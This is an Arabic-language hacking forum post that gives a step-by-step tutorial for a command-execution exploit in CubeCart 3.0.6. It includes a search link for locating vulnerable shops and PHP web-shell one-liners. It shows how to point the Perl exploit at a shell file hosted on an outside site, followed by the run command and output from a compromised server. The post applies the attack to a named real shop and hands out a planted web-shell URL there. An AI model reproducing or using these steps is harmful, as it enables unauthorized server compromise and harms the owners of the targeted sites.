بحث لوحة التحكم مصر
خروج التسجيل مواضيع اليوم

العودة   عالم ابن مصر > عالم التكنولوجيا > عالم الكومبيوتر والانترنت
التسجيّل الأسئلة الشائعة قائمة الأعضاء التقويم البحث مواضيع اليوم جعل جميع المنتديات مقروءة

المشاركة في الموضوع
   
 
قديم 31-03-2006, 10:54 AM   #1 (رابط ثابت)
هاكر محترف
 
الصورة الرمزية لـ الصفر البارد
 
تاريخ التسجيّل: Mar 2003
المشاركات: 517
الصفر البارد
ثغرة CubeCart كوماند (بالصور)+تطبيق على موقع,+ شيل هدية لكم........

السلام عليكم ورحمة الله وبركاتة


هذا الشرح بعضة من اخوي متكي
والباقي تجميييع


هذي ثغرة جديد من نوع كوماند ,, تنفيذ اوامر على السيرفر ,, يعني اللي يحبون الشل ,, وهي على برنامج CubeCart 3.0.6

وللبحث عن مواقع مصابه اضغط الرابط التالي ,,
http://www.google.com.sa/search?hl=a...+3.0 .6&meta=

تاريخ الثغره 30/12/2005 ,, قبل يومين ,,

لتحميل الثغره بملف البيرل (اضغط هنا)

الحين نجي للشغل العملي ,, بعد ماحملتو الملف نروح نفتحه بالمفكره ونعدل عليه حاجه ,, وهي مسار ملف التكست حقك اللي يحتوي على الداله اللي تبيها ,,
والطريقه كتالي ,,
اول شي سو لك ملف بالمفكره واكتب فيه التالي ,,
<?php
system($cmd);
?>

واحفظه بمتداد txt وارفعه على اي موقع ,, طبعا تقدر تحط الداله اللي تبيها انا حطيت هنا system ,, في الثغره كاتبين حط


كود PHP:


رمز:
<?passthru($_GET[cmd]);?>
عاد على حسب السيرفر اللي بتتعامل معه ,,
المهم انا وفرت لكم المشوار وهذا رابط للملف .txt جاهز ,,
http://www.gulflobby.com/lobby/upload/cR.txt

بعد ماتفتح ملف الثغره بتحصل السطر التالي ,,


كود PHP:
كود PHP:
$host $opt_h
$dirs $opt_d
$shel "http://website.com/cmd.txt";    # cmd shell url 
$cmdv "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);) 
$good 0
تعدل فيه بحيث يكون كذا

كود PHP:
كود PHP:
$host $opt_h
$dirs $opt_d
$shel "http://www.gulflobby.com/lobby/upload/cR.txt";    # cmd shell url 
$cmdv "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);) 
$good 0
وتحفظ التعديل ,,
طبعا من غير الخطوه اللي فوق ماراح تشتغل الثغره وهذا بنائا على تجربه ,,
الحين نروح نشغل الثغره على الموقع اللي نبيه بالطريقه التاليه ,,

كود PHP
كود PHP:
1398.pl -h www.aaa.com -/cubaa 
بعدين بيطلع لك كذا ,,
[cijfer@www.xxx.com /]$

نكتب كذا

كود PHP:
كود PHP:
[cijfer@www.xxx.com /]$ id;uname -
وبيعطيك النتيجه ,,


كود PHP:
كود PHP:
uid=48(apachegid=48(apachegroups=48(apache),2523(psaserv
# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 
,,
الان ان شا الله فهمتو الدرس


والآن للعملي

اولا نحدد الموقع
مثال
http://www.ebix.co.uk/shop/

ثم نسوي زي الصووورة


ثم

اتمنى تكونو فهمتو وهذا شيل هدية مني لكم


http://www.ebix.co.uk/shop/includes/webadmin.php
تحياتي
الصفر البار د
__________________






الصفر البارد is offline   الرد مع إقتباس
 
   
المشاركة في الموضوع


خيارات الموضوع
طريقة العرض قيّم هذا الموضوع
قيّم هذا الموضوع:

قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك إضافة مشاركات جديدة
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود [IMG] متاح
كود HTML غير متاح
Trackbacks are متاح
Pingbacks are متاح
Refbacks are متاح


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 05:14 AM.

ترجمة كلمات - دليل مواقع ابن مصر - مواقع صديقة - منتدى ابن مصر
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

Powered by: vBulletin الاصدار 3.6.4
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0 RC4 ©2008, Crawlability, Inc.